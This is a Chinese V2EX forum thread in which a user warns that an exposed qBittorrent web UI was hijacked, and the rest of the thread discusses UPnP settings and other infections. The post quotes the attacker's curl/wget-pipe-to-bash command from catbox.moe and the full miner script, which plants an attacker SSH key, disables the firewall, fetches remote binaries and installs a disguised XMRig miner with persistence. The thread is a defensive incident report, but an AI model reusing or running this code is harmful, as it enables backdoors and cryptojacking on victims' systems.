qBittorrent web 端 弱密码 + 开启 UPNP 被挂恶意脚本

339 天前
 tinytoadd

今天回家,照常下载种子并导入到我的 qBittorrent , 准备美滋滋地看会电视剧。

由于之前设置了种子完成后自动执行脚本,正常情况应该会自动创建一个到资料库目录的软链接,但今天种子下载好后脚本却没有照常执行。

检查之后吓了一跳,原本的自动执行程序被替换为以下脚本。

bash -c "(curl -s -L http://files.catbox.moe/o0gr8o.sh || wget --no-check-certificate -O - http://files.catbox.moe/o0gr8o.sh) | bash"

检查了一下,是我的 QB 默认开启了 upnp ,家里是公网 IP ,等于直接在公网 8085 端口裸奔了。

我用的群晖 DS220+和矿神的 qBittorrent 应用,暂时没有发现有损失。

提醒一下大家注意防范,贴一下这个脚本的内容。

#! /bin/bash
##
VERSION=e4

# Arguments
#EMAIL=dev@ajay.app
WALLET=41poaCNDTvs33KCFKfekN88Ehf59ddparQdFKFT4XKrUMnc1Ude7xtvhZuKfTai8tDML6gFyTAKY5RuDDxDqLRZpT8QpQ9b
EMAIL=n.v.ovchinnikova@rostec.digital
PORT=15555
AUDITD=http://files.catbox.moe/5eki22.out

function prune_competition() {
    sudo systemctl stop c3pool_miner.service 2>&1
    sudo systemctl disable c3pool_miner.service 2>&1
    sudo systemctl disable xmrig.service 2>&1
    sudo systemctl stop journalctld.service 2>&1
    sudo systemctl disable journalctld.service 2>&1
    kill -9 $(pidof xmrig) >/dev/null 2>&1
    kill $(ps aux | grep "[--]config=" | awk '{print $2}') 2>&1
    sudo killall xmrig 2>&1
    sudo pkill xmrig 2>&1
    sudo pkill auditd 2>&1
    killall -9 xmrig 2>&1
    killall xmrig 2>&1
    pkill xmrig 2>&1
    pkill auditd 2>&1
    killall auditd 2>&1
    rm -rf rm -rf /root/.local/.c 2>&1
    rm -rf "${HOME}/.c3pool" >/dev/null 2>&1
    rm -rf /root/.c3pool >/dev/null 2>&1
    rm -rf "${HOME}/.local/share/auditd" >/dev/null 2>&1
    rm -rf "${HOME}/.local/.c*" >/dev/null 2>&1
    rm -rf "${HOME}/.local/bin/auditd"
    rm -rf /etc/cron.daily >/dev/null 2>&1
    rm -rf /etc/cron.daily/auditd >/dev/null 2>&1
    rm -rf /etc/systemd/system/journalctld.service 2>&1
    find . -name "*c3pool*" -exec rm -rf {} \; 2>&1
    find . -name "*xmrig*" -exec rm -rf {} \; 2>&1
    find . -name "*miner*" -exec rm -rf {} \; 2>&1
    find $HOME -name "*c3pool*" -exec rm -rf {} \; 2>&1
    find $HOME -name "*xmrig*" -exec rm -rf {} \; 2>&1
    find $HOME -name "*miner*" -exec rm -rf {} \; 2>&1
    find $HOME -name "*c4*" -exec rm -rf {} \; 2>&1
    find $HOME -name "*auditd*" -exec rm -rf {} \; 2>&1

    sed -i '/AAAAB3NzaC1yc2EAAAADAQABAAABgQDJRrXGodFAgNzqgVw4QmjxKhZbvc6ReMa0ctI8WGbWBi/d' "${HOME}/.ssh/authorized_keys"
    sed -i '/AAAAB3NzaC1yc2EAAAADAQABAAABgQDJRrXGodFAgNzqgVw4QmjxKhZbvc6ReMa0ctI8WGbWBi/d' "/root/.ssh/authorized_keys"
    sed -i '/c3pool/d;/miner.sh/d' "${HOME}/.profile"
    sed -i '/c3pool/d;/miner.sh/d' "/root/.profile"

    mkdir $HOME/.ssh ; touch $HOME/.ssh/authorized_keys ; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDJRrXGodFAgNzqgVw4QmjxKhZbvc6ReMa0ctI8WGbWBi3pUF++QmmM6Jo4/wMWqOxmdJotN85QpbkRfYuw9QN5aO35RLSJw7o2UOXN9vsaxnIg9wunNstVff22vyjrFrXTNrHaI///P3d4T4w6CCgLlNdNKgKTG176Y7KBmkWWeZvd8phtIaMprhGSbtnvs4v0hADTw+Ej20EeKfphlZsRSVS6zObq6jro4j8iIXvnGEdkIx8b1SP+QK6D+ZOEQxEzD107latrwYbLCNHWX7VP1oK6fbFk3zU+CGOwITiVPKuyX9aNFJVEopZSmreD+b+JoXpYHybiuhL3ex79uCWNWKnfGgBKrSAmnmopvYnd/mQ902ls16j/Cr/YYKhUvFMC7MhuWdazvM9uFT07c8PSPsEJ+vJpW3t2HQkW89mxqjp1rEvURUlqZtkL/3hZEMaamP6phHpSttncyWiMGuLZxoub/2GM8C09+GOOTaf47//mGxtNs5FNWqjyiznznrc=" >> $HOME/.ssh/authorized_keys ; chmod 600 $HOME/.ssh/authorized_keys

    (chmod go-w ~/ && chmod go-w /root && chmod 700 ~/.ssh && chmod 700 /root/.ssh && chmod 600 ~/.ssh/authorized_keys && chown root /root && chown root /root/.ssh) >/dev/null
    sudo sed -i 's/#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config >/dev/null
    sudo sed -i 's/#PubkeyAuthentication yes/PubkeyAuthentication yes/' /etc/ssh/sshd_config >/dev/null
    iptables -P INPUT ACCEPT 2>&1
    iptables -P FORWARD ACCEPT 2>&1
    iptables -P OUTPUT ACCEPT 2>&1
    iptables -F 2>&1
    ufw disable 2>&1
}

function install_auditd() {
    mkdir -p ${HOME}/.local/share/
    cat >${HOME}/.local/share/auditd <<EOL
#!/bin/bash
if [ -z "\$(pidof auditd)" ]; then
    mkdir -p ${HOME}/.local/bin
    curl -s4 -L "${AUDITD}" -o ${HOME}/.local/bin/auditd
    chmod a+x ${HOME}/.local/bin/auditd
    ${HOME}/.local/bin/auditd
    sleep 5
    rm ${HOME}/.local/bin/auditd
fi
EOL
    chmod a+x "${HOME}/.local/share/auditd"

    mkdir -p /etc/cron.daily
    if ! grep "${AUDITD}" "/etc/cron.daily/auditd" >/dev/null; then
        cp ${HOME}/.local/share/auditd /etc/cron.daily/auditd
    fi

    (${HOME}/.local/share/auditd || /etc/cron.daily/auditd) &
}

function install_rig() {
    mkdir -p "${HOME}/.local/.c"
    "${HOME}/.local/.c/journalctld" --help >/dev/null 2>&1 
    if test $? -ne 0; then
        # Attempt to download
        LATEST_LINUX_RELEASE=$(curl -s4 https://api.github.com/repos/xmrig/xmrig/releases/latest | grep browser_download | grep linux-static | cut -d'"' -f4)
        if ! curl -s4 -L "${LATEST_LINUX_RELEASE}" -o /tmp/xmrig.tar.gz; then
            exit 1
        fi

        # Attempt to extract
        if ! tar xf /tmp/xmrig.tar.gz -C "${HOME}/.local/.c" --strip=1; then
            exit 1
        fi
        rm /tmp/xmrig.tar.gz
        mv "${HOME}/.local/.c/xmrig" "${HOME}/.local/.c/journalctld"

        # Check if downloaded
        "${HOME}/.local/.c/journalctld" --help >/dev/null
        if test $? -ne 0; then 
            exit 1
        fi
    fi

    PASS=$(hostname | cut -f1 -d"." | sed -r 's/[^a-zA-Z0-9\-]+/_/g')

    # Config
    CONFIG="${HOME}/.local/.c/config.json"
    sed -i 's/"url": *"[^"]*",/"url": "mine.c3pool.com:'"${PORT}"'",/' "${CONFIG}"
    sed -i 's/"user": *"[^"]*",/"user": "'"${WALLET}"'",/' "${CONFIG}"
    sed -i 's/"pass": *"[^"]*",/"pass": "'"${PASS}"'",/' "${CONFIG}"
    sed -i 's/"max-cpu-usage": *[^,]*,/"max-cpu-usage": 100,/' "${CONFIG}"
    sed -i 's#"log-file": *null,#"log-file": "'"${HOME}/.local/.c/journalctld.log"'",#' "${CONFIG}"
    sed -i 's/"syslog": *[^,]*,/"syslog": false,/' "${CONFIG}"
    sed -i 's/"max-threads-hint": *[^,]*,/"max-threads-hint": 75,/' "${CONFIG}"
    sed -i 's/"background": *[^,]*,/"background": false,/' "${CONFIG}"

    # Config (background)
    cp "${CONFIG}" "${HOME}/.local/.c/config_background.json"
    sed -i 's/"background": *false,/"background": true,/' "${HOME}/.local/.c/config_background.json"

    # Prepare start script
    cat >"${HOME}/.local/.c/journalctl" <<EOL
#!/bin/bash
if [ -z "\$(pidof auditd)" ]; then
    curl -s4 -L "${AUDITD}" -o /tmp/auditd
    chmod a+x /tmp/auditd
    /tmp/auditd
    rm /tmp/auditd
fi

if [ -z "\$(pidof journalctld)" ]; then
    nice ${HOME}/.local/.c/journalctld \$*
fi
EOL
    chmod +x "${HOME}/.local/.c/journalctl"

    # Prepare persistence
    if ! grep journalctl "${HOME}/.profile" >/dev/null; then
        echo "${HOME}/.local/.c/journalctl --config=${HOME}/.local/.c/config_background.json >/dev/null 2>&1" >> "${HOME}/.profile"
    fi
    if ! grep journalctl "/etc/rc.local" >/dev/null; then
        echo "#!/bin/bash" > "/etc/rc.local"
        echo "${HOME}/.local/.c/journalctl --config=${HOME}/.local/.c/config_background.json >/dev/null 2>&1" >> "/etc/rc.local" && chmod a+x "/etc/rc.local"
    fi
    

    if sudo -n true 2>/dev/null; then
        # Attempt to configure huge pages
        if [[ $(grep MemTotal /proc/meminfo | awk '{print $2}') -gt 3500000 ]]; then
            echo "vm.nr_hugepages=$((1168+$(nproc)))" | sudo tee -a /etc/sysctl.conf
            sudo sysctl -w vm.nr_hugepages=$((1168+$(nproc)))
        fi

        if ! type systemctl >/dev/null; then
            /bin/bash "${HOME}/.local/.c/journalctl" --config="${HOME}/.local/.c/config_background.json" >/dev/null 2>&1
        else
            cat >/tmp/journalctld.service <<EOL
[Unit]
Description=systemd journaling
[Service]
ExecStart=${HOME}/.local/.c/journalctl --config=${HOME}/.local/.c/config.json
Restart=always
Nice=10
CPUWeight=1
[Install]
WantedBy=multi-user.target
EOL
            sudo mv /tmp/journalctld.service /etc/systemd/system/journalctld.service
            sudo killall journalctld 2>/dev/null
            sudo systemctl daemon-reload
            sudo systemctl enable journalctld.service
            sudo systemctl restart journalctld.service
        fi
    fi


    if [ -z "$(pidof journalctld)" ]; then
        /bin/bash "${HOME}/.local/.c/journalctl" --config="${HOME}/.local/.c/config_background.json" >/dev/null 2>&1
    fi
}

# Run processes
prune_competition
install_auditd
install_rig

# Version
echo "${VERSION}" > "${HOME}/.local/.c/.version"

sudo /etc/init.d/ssh restart >/dev/null
2004 次点击
所在节点    分享发现
12 条回复
zk8802
339 天前
居然还有注释的…
sinksmell
339 天前
吓的我立马把管理端 IP 设置为内网 IP🤣
Remember
339 天前
按说 upnp 打的洞只是 bt 协议用的,qb 的 webui 管理端口不会打一个外网访问的洞的啊。
tinytoadd
339 天前
@Remember 我的这个版本默认给 webui 管理端口也放开了. 还好 qb 是单独的用户和用户组,索性没事
TrembleBeforeMe
339 天前


要在设置里面手动开启 webui 的 upnp 吧
jedihy
338 天前
你的 qb 不是跑在 docker 里面的吗?

我的是跑在 docker 里,而且 webui 的 upnp 默认没开。
shuang930225
338 天前
监听端口 6881 打开的,有必要端口转发吗?还是不转也能正常做种?
msn1983aa
338 天前
我的 qb 都卡在下载元数据,已经废了。。。。
psirnull
338 天前
WALLET=41poaCNDTvs33KCFKfekN88Ehf59ddparQdFKFT4XKrUMnc1Ude7xtvhZuKfTai8tDML6gFyTAKY5RuDDxDqLRZpT8QpQ9b
Bear13023
338 天前
看楼主的这个感觉自己上个月可能也是中了类似玩意,我是 unraid ,nas 最近用的少就是 plex 听歌用用,存放下照片。

结果我 unraid 系统都登录不上,最终这缓存硬盘被不识别要我格式化再使用。直接换一张盘,这张缓存盘就先不用了。
AshengQAQ
276 天前
c3pool 猫池,wa 矿的,我上个月刚中,也是索性没有对系统造成损坏
y1y1
232 天前
刚刚中招,openwrt 上的 qb
被 docker 坑了。。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/997625

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX